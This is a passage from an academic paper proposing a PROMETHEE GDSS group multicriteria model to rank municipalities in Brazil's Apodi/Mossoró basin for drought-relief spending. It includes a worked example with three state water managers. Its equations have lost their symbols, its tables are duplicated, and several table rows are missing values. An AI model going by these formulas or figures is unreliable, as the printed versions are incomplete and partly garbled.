Given that scenario, according to Silva et al. (2010), decision-making that involves water resources management is usually complex due to the need to consider several objectives that also involve environmental, social, and economic impacts. Kalbar et al. (2013) propose that environmental decisions require the participation of multiple stakeholders and have large-scale implications that affect both the local and global environments. According to Vincke (1992), multicriteria support for decision-making aims to support decision-makers (DMs) with tools that enable them to make progress when solving problems. Sikder & Salehin (2015) state that this is about evaluating alternatives in relation to decision-making criteria and that these tools are practical and useful in helping to solve real-life problems that involve conflicting criteria.
Vincke (1992) states that there are three families of multicriteria methods. The first is characterized by aggregating different points of view into a single function. These include Multi-Attribute Utility Theory (MAUT), Simple Multi-Attribute Rating Technique using Swings (SMARTS), Simple Multi-Attribute Rating Technique Exploiting Ranks (SMARTER), and the Analytic Hierarchy Process (AHP). The second involves the construction of an outranking relationship between the alternatives and the exploitation of that relationship, including the elimination and choice translating algorithm (ELECTRE) and the Preference Ranking Method for Evaluation Enrichment (PROMETHEE). The third family, also known as interactive methods, alternates between calculation and dialogue steps. The management of water resources is a very promising research field, where several tools and approaches can be used to focus on different aspects of the problem. This is evidenced by the studies of Tsakiris & Spiliotis (2011), Spiliotis et al. (2015), and Pinto et al. (2017).
According to Lu et al. (2007), group decision-making is defined as a decision situation in which more than one individual is involved. To Silva & Morais (2014), the decision of a group is given by aggregating individuals' preferences. The result may not reflect the opinion of each individual DM, thus implying that there is a high level of divergence among them. There are several tools that can be used to convert individual decisions into group decisions. Among them is the PROMETHEE group decision support system (PROMETHEE GDSS) proposed by Macharis et al. (1998), which is based on the PROMETHEE and GAIA methods. According to Gonçalves & Belderrain (2012), PROMETHEE GDSS belongs to the family of outranking methods and sets out to address the ranking problem. Using group decision-making support methods that can ensure public participation in the decision-making process, Michels (2016) states that public participation has become increasingly important in the water sector, and public engagement is included to improve the quality of decision outcomes, to generate legitimacy in the process, and to solve water-related conflicts.
Given this context, this study proposes a multicriteria model for ranking the municipalities in a semi-arid region to better allocate actions to combat the drought and its effects in a crisis management context. The proposed model is applied in the semi-arid region of the state of Rio Grande do Norte. It seeks to identify which municipalities are in the most critical situation regarding the impacts associated with the drought.
The next section describes the status of the water resources in the semi-arid region of Rio Grande do Norte. Afterwards, the multicriteria model for prioritizing the municipalities is presented. Then, the numerical application of the model is performed using the PROMETHEE GDSS methodology. The results obtained are discussed and final considerations are presented.
## Status of water resources in the Brazilian semi-arid region
Magalhães (2016) states that the northeastern region has the greatest frequency and intensity of droughts. The semi-arid region, also known as ‘Sertão,’ usually suffers from scarcity of water and is strongly affected by periodic droughts. According to Campos & Studart (2008), even though the demographic density is low and there is little anthropogenic degradation, the semi-arid environment does not offer sustainable conditions for agriculture in dry years. However, there is a set of conventional solutions that can be used to address the problem, namely, inter-basin transfer, constructing dams, introducing irrigation, forecasting drought, mounting work fronts, building water tanks, and engaging in new practices in water resources management.
According to Magalhães (2016), 2015 was the fourth consecutive year of drought. This is very serious because, in addition to the loss of agricultural output, small-, medium- and even some large-capacity reservoirs have dried up, and water trucks must bring water from locations that are at even greater distances from where help is needed. The recent situation has been one of the most complicated due to the current length of the drought period in the region, which has persisted since 2012. Consequently, the level of water used for consumption and held in reservoirs has fallen sharply. According to the data from ANA (2016), the levels of water in the reservoirs of the northeastern region fell from 46.3% of total capacity in 2012 to 16.3% in 2016. The situation is similar in the state of Rio Grande do Norte where the decrease was from 52.5% to 15.5% in 2016.
The situation may be worsened by the context of climate change that directly affects the region. According to IPCC (2014), the risk of water supply shortages will increase due to reduced rainfall and increased evapotranspiration rates in the Brazilian northeast region, thereby affecting the water supply, the ability to generate power, and the sustainability of agriculture. To Angelotti et al. (2015), the higher temperatures in the semi-arid area tend to increase its water deficit, thus considerably affecting rain-dependent activities.
Approximately 92% of the territory of the state of Rio Grande do Norte is semi-arid, which makes matters worse. Therefore, due to the prolongation of the drought, the state government, by Decree Number 25,931 of 03/21/2016, renewed the emergency status for 153 of the 167 municipalities in the state, which account for 91.6% of land in the state. Of these municipalities, 21 are in total collapse and therefore water trucks or artesian wells are used to meet their supply needs.
According to SEMARH (2016), the state has 16 river basins, of which the Apodi/Mossoró and Piranhas/Açu basins are the largest. In March 2016, the basins held only 21.85% and 17.25% of their water capacity, respectively. According to data from ANA (2016), the volume of water in the state reservoirs dropped to the 19.9% capacity mark. Given the below-average rainfall forecast for 2016, the trend is for there to be further large-scale depletion of these levels in the region in 2017. In regions with a water deficit, irrigation plays a primordial role in planning agricultural development. Consequently, the drought has a considerable impact on the economy of the regions affected, which are generally characterized by a high dependence on agriculture, specifically small-holder farming.
The management of water resources in the state is carried out under the management of the Secretariat for the Environment and Water Resources (SEMARH). A representative of the Secretariat chairs the State Council of Water Resources, a body of collective deliberation and of normative character. The council's responsibilities include arbitrating conflicts between users, defining criteria for charging for water use, and other matters related to the management of water resources. The council comprises representatives of public bodies, of users, and of civil society; and river basin committees.
Given the economic recession, there is a shortage of financial resources for actions to combat the effects of the drought. Therefore, it is imperative to know how to better allocate what resources there are for the municipalities that are in the most critical situation. Thus, a multicriteria model is proposed to address the problem.
## Group multicriteria model for allocating resources to combat drought in the Brazilian semi-arid region
The proposed model, presented in Figure 1, can be used to support group decision-making on allocating resources to combat the drought.
Fig. 1.
Flowchart of group multicriteria model for allocating resources to combat the drought in the Brazilian semi-arid region.
Fig. 1.
Flowchart of group multicriteria model for allocating resources to combat the drought in the Brazilian semi-arid region.
In the preparation stage, it is important to identify the DMs involved in the problem. In order to minimize the occurrence of conflicts and to consider the different points of view, a representative of each of the various stakeholders should be involved, and not just water resource specialists. Meetings should be held to define the problem and the objectives to be achieved, so that all participants are aware of what is being analyzed. De Carvalho et al. (2017) emphasize that stakeholders when undertaking decision analysis may reveal biases that are myopic, omissive, divisive, and insensitive, specifically in decisions in the water sector. To deal with the problem, they propose using the Delphi technique to obtain reliable information before taking a decision, and thereby identify the non-neutrality of decision analysis and (re)think the stakeholder's participation. In this context, the figure of the supra-decision-maker is very important as the agent in a hierarchical or political position above the other DMs. This agent can act to emphasize the importance of the process, thus ensuring everyone's commitment during the preparation process. At this stage, problem structuring methods can be applied, as presented by Ackermann (2012). Another important process at this stage involves selecting the method to support decision-making. Roy & Slowinski (2013) propose questions to help an analyst choose a method that aids in solving the problem. These include: (1) what type of outcome is expected by applying the model, and whether this should be a numeric value (score or utility), about ranking alternatives, allocating alternatives into classes, etc.; (2) what are the requirements for preference scales, acquiring preference information, handling imperfect knowledge, accepting compensation among criteria, and whether criteria interact with each other; (3) secondary questions, which deal with intelligibility, characterizing axioms, and identifying weaknesses in the methods considered.
The individual evaluation stage begins with identifying a stable set of alternatives that will be considered in the analysis. Alternatives should be grouped according to their geographical location, the presence of a river basin, or other criteria. Next, the criteria to be considered for ranking should be defined. DMs may choose to use criteria common to all, or they may use different criteria structures, depending on their point of view about the problem. Using different criteria does not affect the result of the application since the input considered in the group decision-making stage is the ranking of alternatives and their scores. Each DM then determines weights and other necessary parameters, and as a result draws up their evaluation matrix. The individual evaluation is performed and therefore obtains the rank of the alternatives for each DM, as well as their relative scores. Sensitivity analysis should be performed varying the parameters to verify their impact on the rank obtained.
Once the individual rankings of each DM are obtained, the group decision-making stage begins. Each decision-maker's weights must be defined according to their power of decision-making. Defining these weights at this stage can be achieved by consensus or by a supra-decision-maker. Based on the DM's weights and on the individual rankings, the matrix of the global evaluation of the alternatives should be drawn up. Once the overall assessment of the alternatives has been made, a sensitivity analysis should be performed to evaluate the results obtained, and conflicts surrounding the solution should be discussed. In the discussion stage, the analyst should identify the potential conflict points between the group ranking and the individual rankings and present the key factors that led to this outcome. DMs can also present their opinions about the results obtained. The multicriteria model, in this context, has the role of augmenting the discussion among the DMs by analyzing their preferences objectively.
As to the questions proposed by Roy & Slowinski (2013) and the character of group decision-making, the PROMETHEE GDSS method, proposed by Macharis et al. (1998), was selected to operationalize the methodology of the model. Initially, given the type of result expected, the method ranks the alternatives. As the analysis is generally carried out within a closed set of alternatives (municipalities of the river basin or geographic region), it is not necessary to obtain an index to identify municipalities, but only to order them. The method also succeeds in processing both numeric and verbal preference scales, thereby facilitating the elicitation process. Another important factor is the non-compensatory character of the methodology. Thus, all the information available in the evaluation matrix is considered in the application, and there is no direct compensation between the performances in the different criteria. In addition, the use of preference functions facilitates how the DMs' preferences are judged, since the DMs' hesitation can be seen by using preference and indifference thresholds. Furthermore, the PROMETHEE GDSS uses similar methodological structures both in evaluating individual performances and those made by group decision. This facilitates understanding the evaluation and its acceptance. In addition, if it is in the group's interest and if there are many biases among the stakeholders, the method allows each DM to use his/her own preference structure independently. Therefore, it is not necessary to reach consensus on the criteria, weights, and other parameters in the individual stage. The method presents a significant problem by using pairwise comparisons between alternatives, which can generate rank reversal. This factor is minimized when considering the application for closed sets of alternatives, with no inclusion or exclusion of municipalities in the areas under analysis.
Regarding the individual evaluation stage, Macharis et al. (1998) propose using the PROMETHEE II methodology for each DM involved. The method, according to Brans et al. (1998), given that there are weights to represent the degree of importance for each criterion, computes the outranking degree in accordance with Equation (1):
(1)
where is a number between 0 and 1 that increases when increases and is equal to zero, if . To find the value of the function , the DM can choose, for each criterion, one of the six functions according to the values of preference (p) and indifference (q) thresholds, as shown in Figure 2.
Fig. 2.
Preference functions for the PROMETHEE methodology, adapted from Brans et al. (1986).
Fig. 2.
Preference functions for the PROMETHEE methodology, adapted from Brans et al. (1986).
According to Figure 2, the DM must choose from the following six functions: (1) a usual function, when there is no parameter to be defined; (2) a U-shape function, for which the parameter q is defined; (3) a V-shape function by setting the parameter p; (4) a level function, considering the parameters q and p; (5) a linear function, which also considers the parameters q and p; and (6) the Gaussian criterion, in which the standard deviation must be fixed.
Once the values of are obtained, two complete preorders can be obtained; the first preorder is represented by an order of actions following the descending order of the numbers , as shown in Equation (2):
(2)
The second preorder follows the increasing order of the numbers , as shown in Equation (3):
(3)
The intersection of these two flows generates the partial preorder result of applying the PROMETHEE I method. The PROMETHEE II method consists of ordering the actions following the flow as defined in Equation (4). Thus, a single complete preorder is obtained.
(4)
Next, the opinions of the group of DMs should be evaluated, as proposed by Macharis et al. (1998). The evaluation matrix is set up using the net flows generated from the application of the PROMETHEE II for each DM. Thus, each DM can be assigned a weight by setting the decision-making power of each DM. The PROMETHEE II methodology is applied to generate the rank of the alternatives based on the positions that each DM expresses. According to Macharis et al. (1998), there is no general rule that can be used to address the conflicts and therefore they recommend tackling the conflicts by returning to previous steps.
The model was evaluated by applying it in order to prioritize the municipalities of Rio Grande do Norte, and took the water resource managers' points of view into account.
## Numerical application
For the numerical application of the model, three DMs (D1, D2, and D3) acting at SEMARH were considered. The objective of applying it was to test its implementation prior to doing so at the State Council of Water Resources. The sector where DMs act is responsible for planning and executing public policies related to water management, including directing actions to combat the drought. Initially, contact was made with the person in charge of the sector, who was characterized as being the supra-decision-maker. He highlighted the impact that the financial crisis is having on the State of Rio Grande do Norte. This prevents the needs of all municipalities that require support from being met. He also emphasized that the current decision-making process lacks a firm structure and does not use any support tool. He indicated the three agents who should participate in the preliminary decision-making process. Decision-maker D1 is responsible for the Water Resources Planning and Management sector; D2 works in the infrastructure sector and is responsible for conducting studies, and managing projects and construction works; D3 is a member of the environment and sanitation sector.
As to the proposed model, there was discussion about the criteria that should be considered. The DMs decided to use the same criteria to analyze the problem, with the justification that this facilitates discussing the results when the application is concluded. Table 1 lists the criteria that the DMs consider are important.
Table 1.
Criteria considered in the prioritization process.
C1 Population served (no. of inhabitants) Number of inhabitants living in the municipality Max Quantitative
C2 No. of hospitals and basic health units Number of hospitals and basic health units (BHU) located in the municipality Max Quantitative
C3 No. of educational institutions Number of educational units located in the municipality Max Quantitative
C4 Human development index (HDI) Human development index attributed to the municipality Min Quantitative
C5 Income per capita (in R$) Monthly per capita income Min Quantitative C6 Gross domestic product of the agricultural sector (in thousands of R$) GDP added from the municipality's agricultural sector Max Quantitative
C7 Gross domestic product of the industrial sector (in thousands of R$) GDP added from the municipality's industrial sector Max Quantitative C8 Current status of local reservoirs (%) Consider the current availability of water in the reservoirs that serve the municipality Min Quantitative CodeCriteriaDescriptionMax/MinScale C1 Population served (no. of inhabitants) Number of inhabitants living in the municipality Max Quantitative C2 No. of hospitals and basic health units Number of hospitals and basic health units (BHU) located in the municipality Max Quantitative C3 No. of educational institutions Number of educational units located in the municipality Max Quantitative C4 Human development index (HDI) Human development index attributed to the municipality Min Quantitative C5 Income per capita (in R$) Monthly per capita income Min Quantitative
C6 Gross domestic product of the agricultural sector (in thousands of R$) GDP added from the municipality's agricultural sector Max Quantitative C7 Gross domestic product of the industrial sector (in thousands of R$) GDP added from the municipality's industrial sector Max Quantitative
C8 Current status of local reservoirs (%) Consider the current availability of water in the reservoirs that serve the municipality Min Quantitative
As shown in Table 1, criteria C1, C2, and C3 were used to measure the direct impact of the lack of water on the local population. C1 refers to the total population of each municipality, and represents the total number of people who would be affected in the event of the lack of water. C2 is used to measure the number of public or private health facilities that are critically affected when problems occur in the water supply. C3 is used to consider the number of educational units, where supply problems can disrupt teaching in schools and colleges. In this context, for the three criteria, the higher their value, the more critical the lack of water is for the sustainability of the municipalities. Criteria C4 and C5 seek to represent the local population's socioeconomic characteristics. It was decided to use HDI (C4) so as to represent the degree of human development of the locality, the focus being on economic development and quality of life. Thus, the lower the HDI, and the less developed the municipality, the greater the attention that should be paid to the inhabitant's basic needs. Similarly, per capita income (C5) was defined as an indicator of the population's income, which may impact the possibility of investing in other sources of water supply. Criteria C6 and C7 were defined to identify the profile of the local economy. To this end, the DMs decided to use the GDP of the agricultural (C6) and industrial (C7) sectors, and thereby to represent the gross added values these GDPs add to the local economy. It is observed that the profile of the agricultural sector of the region consists predominantly of small-holdings, with small- to medium-sized fields and plantations, often oriented towards providing subsistence to the family working the land. The industrial sector is evaluated as underdeveloped in the region and is concentrated in the largest towns. Therefore, the impacts generated by problems in the water supply cause different impacts, depending on the prevailing economic profile in the municipalities and, thus, it is important to evaluate these aspects separately. While in the industrial sector there can be large-scale unemployment and companies going out of business, in the agricultural sector, the lack of water can jeopardize subsistence farming and lead to an exodus from rural areas. Finally, in criterion C8, the current status of the water reservoirs that supply each municipality was considered. It should be noted that, for this criterion, the reservoir was considered the main source of water supply for each municipality. However, in a municipality, there may be villages that use different reservoirs for their water supply.
Based on the criteria considered, each DM sets up their own evaluation matrix, while considering the weights of the most adequate criteria, evaluating the alternatives, and defining the other parameters. For the numerical application, the hydrographic basin of the Apodi and Mossoró rivers was selected. It consists of 51 municipalities. To simplify the evaluation of this study, the municipalities that form the following areas were analyzed.
• Lower section, comprising the municipalities of Areia Branca (A1), Baraúna (A2), Grossos (A3), Mossoró (A4), Serra do Mel (A5), and Tibau (A6).
• Medium inferior section, comprising the municipalities of Governador Dix Sept Rosado (A7), Apodi (A8), Felipe Guerra (A9), Caraúbas (A10), Upanema (A11), Campo Grande (A12), and Janduís (A13).
The reference values for criteria C1, C2, C3, C4, C6, and C7 were obtained from data provided by the Brazilian Institute of Geography and Statistics (IBGE) on their website. The values for criterion C5 were obtained from data from the United Nations Development Program (UNDP) in 2010. The data for criterion C8 were obtained from the Water and Sewage Company of Rio Grande do Norte (CAERN). For this criterion, a score of 100% was attributed to municipalities that have the option of sourcing their water supply from large artesian wells. Municipality (A4) stands out because it has a mixed water supply (wells and pipeline). Table 2 presents the parameters considered by the DMs and the evaluation matrix for the situation considered.
Table 2.
Parameters and evaluation matrix of the alternatives.
D1Criteria
C1C2C3C4C5C6C7C8
Weights 0.2222 0.0556 0.0556 0.0278 0.0556 0.0833 0.0556 0.4444
Preference function U-shape Usual U-shape U-shape U-shape U-shape U-shape Usual
5,000 – 0.01 20 5,000 5,000 –
D2C1C2C3C4C5C6C7C8
Weights 0.1739 0.0435 0.0435 0.0870 0.0435 0.1304 0.2174 0.2609
Preference function U-shape Usual U-shape U-shape U-shape U-shape U-shape Usual
3,000 – 0.02 30 4,000 4,000 –
D3C1C2C3C4C5C6C7C8
Weights 0.2909 0.0727 0.0364 0.0545 0.0545 0.0727 0.0545 0.3636
Preference function U-shape Usual U-shape U-shape U-shape U-shape U-shape Usual
6,000 – 0.01 20 6,000 5,000 –
MunicipalitiesC1C2C3C4C5C6C7C8
A. Branca (A1) 25,315 10 49 0.682 449.02 10,307 500,072 100
Baraúna (A2) 24,182 67 0.574 263.68 85,003 191,568 100
Grossos (A3) 9,393 18 0.664 410.84 2,618 60,512 100
Mossoró (A4) 259,815 115 340 0.72 600.28 141,413 1,998,062 19.81
S. do Mel (A5) 10,287 22 47 0.614 284.48 11,100 27,935 100
Tibau (A6) 3,687 13 0.635 396.51 2,137 12,917 100
Dix Sept (A7) 12,374 28 0.592 267.12 4,337 144,123 100
Apodi (A8) 34,763 12 86 0.639 358.66 28,216 207,992 100
F Guerra (A9) 5,734 19 0.636 298.60 2.431 62,967 100
Caraubas (A10) 19,576 11 53 0.638 321.99 11,537 103,224 100
Upanema (A11) 12,992 22 0.596 233.97 6,384 54,826 100
C Grande (A12) 9,289 27 0.621 – 5,368 16,892 19.81
Janduis (A13) 5,345 10 0.615 272.39 2,510 2,921 19.81
D1Criteria
C1C2C3C4C5C6C7C8
Weights 0.2222 0.0556 0.0556 0.0278 0.0556 0.0833 0.0556 0.4444
Preference function U-shape Usual U-shape U-shape U-shape U-shape U-shape Usual
5,000 – 0.01 20 5,000 5,000 –
D2C1C2C3C4C5C6C7C8
Weights 0.1739 0.0435 0.0435 0.0870 0.0435 0.1304 0.2174 0.2609
Preference function U-shape Usual U-shape U-shape U-shape U-shape U-shape Usual
3,000 – 0.02 30 4,000 4,000 –
D3C1C2C3C4C5C6C7C8
Weights 0.2909 0.0727 0.0364 0.0545 0.0545 0.0727 0.0545 0.3636
Preference function U-shape Usual U-shape U-shape U-shape U-shape U-shape Usual
6,000 – 0.01 20 6,000 5,000 –
MunicipalitiesC1C2C3C4C5C6C7C8
A. Branca (A1) 25,315 10 49 0.682 449.02 10,307 500,072 100
Baraúna (A2) 24,182 67 0.574 263.68 85,003 191,568 100
Grossos (A3) 9,393 18 0.664 410.84 2,618 60,512 100
Mossoró (A4) 259,815 115 340 0.72 600.28 141,413 1,998,062 19.81
S. do Mel (A5) 10,287 22 47 0.614 284.48 11,100 27,935 100
Tibau (A6) 3,687 13 0.635 396.51 2,137 12,917 100
Dix Sept (A7) 12,374 28 0.592 267.12 4,337 144,123 100
Apodi (A8) 34,763 12 86 0.639 358.66 28,216 207,992 100
F Guerra (A9) 5,734 19 0.636 298.60 2.431 62,967 100
Caraubas (A10) 19,576 11 53 0.638 321.99 11,537 103,224 100
Upanema (A11) 12,992 22 0.596 233.97 6,384 54,826 100
C Grande (A12) 9,289 27 0.621 – 5,368 16,892 19.81
Janduis (A13) 5,345 10 0.615 272.39 2,510 2,921 19.81
The performance of the C5 criterion for alternative A12 was not obtained because the municipality was created recently. Therefore, the average per capita income of all municipalities was adopted for it. Regarding the weights of the criteria, the DMs were informed about the significance of the criteria, there being a criterion with a weight 2× that is twice as important as a criterion with weight x. From this information, each DM freely assigned the values of the weights for each criterion and could modify them as often as necessary. Regarding the parameters, there was a consensus on using the same preference functions (usual and U-shape). For the criteria to which the usual function was assigned, the DMs agreed that any difference in the performance of the alternatives implies preference. The U-shape function was chosen because the DMs considered it necessary to consider an indifference threshold for criteria with a large range of values.
Next, the PROMETHEE II method was applied in order to rank the alternatives for each DM using Visual PROMETHEE software. The rankings and scores obtained by the individual and group stages are presented in Figure 3.
Fig. 3.
Rankings obtained from the individual and group decisions.
Fig. 3.
Rankings obtained from the individual and group decisions.
Sensitivity analysis was performed on the results obtained based on the variation in the weights assigned to each criterion for each DM. For this analysis, we used the walking weights procedure whereby the weights were increased and decreased by 20%. As illustrated in Pinto et al. (2017), Figure 4 presents the minimum and maximum placements for each alternative, obtained from the sensitivity analysis.
Fig. 4.
Minimum and maximum placements of each alternative during sensitivity analysis.
Fig. 4.
Minimum and maximum placements of each alternative during sensitivity analysis.
As seen in Figure 4, from the sensitivity analysis, the alternatives are placed in different positions in the DMs' rankings. For D1, it is observed that the greatest variation occurs for alternative A2, which varies between fifth and second place. Therefore, the DM should re-evaluate the weights assigned to each criterion, thereby ensuring that the weights used adequately reflect his/her vision. For the decision-maker D2, the variation is smaller, alternatives A11 and A12 being those with the greatest range of positions in the ranking. For decision-maker D3, alternatives A10, A12, and A13 have a maximum variation of two positions. It is concluded from the analysis that the results obtained, for the most part, are relatively stable, with variations that have little impact on the result.
One of the concerns of methods that use pairwise comparisons is rank reversal when this leads to the inclusion or exclusion of alternatives. However, in this specific case, this issue is not relevant since all possible alternatives (municipalities) of the hydrographic basin areas of the Apodi and Mossoró rivers were considered.
With the ranking and the scores of each alternative, the DMs' opinions were aggregated to obtain the position of the group, as shown in Figure 3. In this case, all DMs had the same decision-making power. Sensitivity analysis was performed based on variations in the DMs' weights. This operation did not yield any significant changes in the ranking. Thus, only tiebreakers were performed between the alternatives that had the same position in the initial ranking.
## Discussion of the results
From the analysis of the results obtained, as expressed in Figure 3, some results stand out. First in the ranking was the municipality of Mossoró (A4). This is because it is the largest municipality in the delimited region and it relies on the water supply from mains lines that collect water from the reservoirs. The large numbers of the population affected and the economic factors involved also influenced its positioning, which was shared by all DMs. It should be noted that part of the municipality's water supply is sourced from wells, which is not a long-term solution for compensating for the lack of water. The municipality of Apodi (A8) is in second place in the ranking, specifically due to economic and social factors. Baraunas (A2) and Caraubas (A10) are in third and fourth places, respectively. The municipality of Areia Branca (A1) is in fifth place in the group's final ranking and is tied with the municipality of Campo Grande (A12). Areia Branca is very important for the industrial sector because it accounts for an important part of the national production of salt. The municipality of Janduís (A13) appears to be in an advantageous position in the ranking, mainly because its water supply is primarily sourced from dams and because no wells are used to supply its water.
When comparing the group ranking to the results of each DM, a certain degree of consistency is observed in the first positions of the ranking. For all DMs, A4, A8, and A2 are in the first three positions, with A4 being in the first position for all three DMs. The A10 alternative, in fourth place for the group ranking, is also positioned at the top of the ranking for the three DMs. There is a potential point of conflict with regard to evaluating alternative A13, which is positioned in the seventh position of the group ranking while varying from the fifth to the tenth position in the individual evaluations. In this case, the municipality has a low HDI, a low per capita income, and low water levels in the reservoirs. Therefore, the variation in the weights attributed to these criteria by the DMs leads to this variation in the position of the ranking. To solve the conflict, the analysis can be traced back to previous phases to refine the evaluations and to deal with the discrepancies found, as well as to discuss the factors that led the DMs to reach the final ranking. In general, the global ranking obtained mirrors the DMs' individual evaluations quite closely.
In this context of droughts, the State of Rio Grande do Norte has been carrying out emergency actions, which have included drilling deep wells and installing desalinators, to convert impure water from these wells to drinking water. Another action that is being taken involves installing emergency water mains, which carry water from reservoirs that still have stored water. There is also an alternative water supply program. In this program, water tank trucks are used to carry water from storage points to certain locations, especially small towns. Measures are also taken to prepare for the rainy season, such as the desorption and cleaning of rivers and canals to guarantee the flow of water when the rainy season returns.
In addition, some interventions and policies can be undertaken in order to improve the results of water resources management. Initially, it is suggested investment be made to inspect the use of water in the region. Conflicts over water use are quite common, including occurrences of water theft. It is also necessary to better plan and manage the current dam structure in the region. When rains occur, the main reservoirs of the State receive water only when the various smaller dams overflow. This delays replenishment of the most important reservoirs for supply, while smaller reservoirs supplying small communities, often without adequate control, are supplied quickly. Thus, investments in the distribution network should be made to ensure the distribution of piped water to the most remote communities, since this will discourage using illegal and low-quality water sources. The State can also invest in alternative water sources, such as by increasing investment in harvesting rainwater and in desalination plants, thus taking advantage of access to the sea. Such measures can minimize the negative effect of drought periods by enabling an emergency supply in the short and medium term. Another important source of water involves the drilling of wells to use water from the State's underground aquifers. Finally, there is a need for constant investment in the process of raising awareness of the local population as to the conscious use of water.
Regarding the application in the hydrographic basin of the Apodi and Mossoró rivers, the importance of the city of Mossoró for the region is highlighted. It is also worth mentioning that it is quite common for residents of neighboring municipalities to go to Mossoró to seek medical attention and attend educational institutions, mainly universities. However, the municipality has its supply complemented by water from deep wells, which provides a certain guarantee of supply to the city. It should be noted, however, that drilling wells is not feasible for most municipalities since not all areas have adequate access to aquifers. Thus, for other cities, such as Janduís and Campo Grande, the situation is more complicated since the water from wells is not available to the water company, which therefore uses a rotational water supply system when the city is supplied for only part of the month. Hence, it is important that managers also pay attention to smaller municipalities and areas farthest from the cities. The use of water tank trucks, in this context, should prioritize the supply of those areas in which the population density is lowest, thereby guaranteeing subsistence conditions for these populations.
## Conclusions
Considering the projections of climate change for the region, there is a tendency for the duration of drought periods to increase because of a reduction in rainfall. Thus, a more efficient allocation of resources is necessary in order to maximize socioeconomic gains. The use of the proposed model can support decision-making regarding how best to use resources to combat the effects of drought, as well as how to facilitate discussion and to seek consensus among the various stakeholders. In this context, a group multicriteria model was proposed to rank the municipalities of the region so as to direct the efforts of the public administration in the fight against drought and to mitigate its effects. The model considers the points of view of the various stakeholders involved and was applied to the Apodi-Mossoró river basin to verify its functionality. In this instance, the PROMETHEE GDSS method was selected and the preferences of three decision-makers were evaluated.
In future research, the proposed model can be used by members of the State Council of Water Resources directly involved in the problem. Based on analyzing the data, it will be possible to empirically support the decision-making process of the managers in the sector. It is also suggested that experts in the directly affected areas, including specialists in water resources, public health, and society, evaluate the proposed model. Therefore, it is intended to create a forum for discussions to define the entire structure of criteria to be considered for resource allocation, and for the region's water managers to take an active part in this. The use of the PROMETHEE GDSS fuzzy method will also be recommended to make it easier for the decision-makers to define the parameters. There is also a possibility of using voting procedures in case there is a larger number of decision-makers involved.
## Acknowledgments
This work is part of a research project supported by the National Research Council (CNPq, grant: 309143/2014-4). The authors would like to express their sincere appreciation to the anonymous referees who provided constructive comments which enhanced the quality of this paper.
## References
References
Ackermann
F.
, (
2012
).
Problem structuring methods ‘in the Dock’: arguing the case for Soft OR
.
European Journal of Operational Research
219
,
652
658
.
doi: 10.1016/j.ejor.2011.11.014
.
ANA
(
2016
).
Boletim de acompanhamento dos reservatórios do Nordeste [Bulletin on Monitoring Northeastern Reservoirs]
.
National Agency of Waters
,
Brasilia
.
Boggia
A.
&
Rocchi
L.
, (
2010
).
Water use scenarios assessment using multicriteria analysis
.
Journal of Multi-Criteria Decision Analysis
17
(
5
),
125
135
.
doi: 10.1002/mcda.457
.
Brans
J. P.
,
Vincke
P.
&
Mareschal
B.
, (
1986
).
How to select and how to rank projects: the Promethee method
.
European Journal of Operational Research
24
(
2
),
228
238
.
doi: 10.1016/0377-2217(86)90044-5
.
Brans
J. P.
,
Macharis
C.
,
Kunsch
P. L.
,
Chevalier
A.
&
Schwaninger
M.
, (
1998
).
Combining multicriteria decision aid and system dynamics for the control of socio-economic processes: an iterative real-time procedure
.
European Journal of Operational Research
109
(
2
),
428
441
.
doi: 10.1016/S0377-2217(98)00068-X
.
Buurman
J.
,
Mens
M. J. P.
&
Dahm
R. J.
, (
2016
).
Strategies for urban drought risk management: a comparison of 10 large cities
.
International Journal of Water Resources Development
33
(
1
),
31
50
.
doi: 10.1080/07900627.2016.1138398
.
Campos
J. N. B.
&
Studart
T. M. C.
, (
2008
).
Drought and water policies in Northeast Brazil: backgrounds and rationale
.
Water Policy
10
,
425
438
.
doi: 10.2166/wp.2008.058
.
De Carvalho
B. E.
,
Marques
R. C.
&
Netto
O. C.
, (
2017
).
Delphi technique as a consultation method in regulatory impact assessment (RIA) – the Portuguese water sector
.
Water Policy
19
(
3
),
423
439
.
doi: 10.2166/wp.2017.131
.
Dong
F.
,
Liu
Y.
,
Su
H.
,
Liang
Z.
,
Zou
R.
&
Guo
H.
, (
2016
).
Uncertainty-based multi-objective decision making with hierarchical reliability analysis under water resources and environmental constraints
.
Water Resources Management
30
(
2
),
805
822
.
doi: 10.1007/s11269-015-1192-7
.
Ferguson
B. C.
,
Brown
R. R.
,
Frantzeskaki
N.
,
de Haan
F. J.
&
Deletic
A.
, (
2013
).
The enabling institutional context for integrated water management: lessons from Melbourne
.
Water Research
47
(
20
),
7300
7314
.
doi: 10.1016/j.watres.2013.09.045
.
Gonçalves
T. J.
&
Belderrain
M. C.
, (
2012
).
Performance evaluation with PROMETHEE GDSS and GAIA: a study on the ITA-SAT satellite project
.
Journal of Aerospace Technology Management
4
(
3
),
381
392
.
doi: 10.5028/jatm.2012.04033411
.
Hong
I.
,
Lee
J.
&
Cho
H.
, (
2016
).
National drought management framework for drought preparedness in Korea (lessons from the 2014–2015 drought)
.
Water Policy
18
,
89
106
.
doi: 10.2166/wp.2016.015
.
IPCC
(
2014
).
Climate Change 2014: Impacts, Adaptation, and Vulnerability
.
Working Group II Contribution to the IPCC 5th Assessment Report
.
Cambridge University Press
,
New York
,
USA
.
Kalbar
P. P.
,
Karmakar
S.
&
Asolekar
S. R.
, (
2013
).
The influence of expert opinions on the selection of waste water treatment alternatives: a group decision-making approach
.
Journal of Environmental Management
128
,
844
851
.
doi: 10.1016/j.jenvman.2013.06.034
.
Lu
J.
,
Zhang
G.
,
Ruan
D.
&
Wu
F
, . (
2007
).
Multi-Objective Group Decision Making: Methods, Software and Applications with Fuzzy Set Techniques
.
Imperial College Press
,
London
,
UK
.
Macharis
C.
,
Brans
J. P.
&
Mareschal
B.
, (
1998
).
The GDSS PROMETHEE procedure
.
Journal of Decision Systems
7
,
283
307
.
Magalhães
A. R.
, (
2016
).
Life and drought in Brazil
. In:
Drought in Brazil: Proactive Management and Policy
.
De Nys
E.
,
Engle
N. L.
&
Magalhães
A. R.
(eds).
CRC Press, Taylor & Francis Group
,
New York
,
USA
.
Pinto
F. S.
,
Costa
A. S.
,
Figueira
J. R.
&
Marques
R.
, (
2017
).
The quality of service: an overall performance assessment for water utilities
.
Omega
69
,
115
125
.
doi: 10.1016/j.omega.2016.08.006
.
Pischke
F.
&
Stefanski
R.
, (
2016
).
Drought management policies – from global collaboration to national action
.
Water Policy
18
,
228
244
.
doi: 10.2166/wp.2016.022
.
Roy
B.
&
Slowinski
R.
, (
2013
).
Questions guiding the choice of a multicriteria decision-aiding method
.
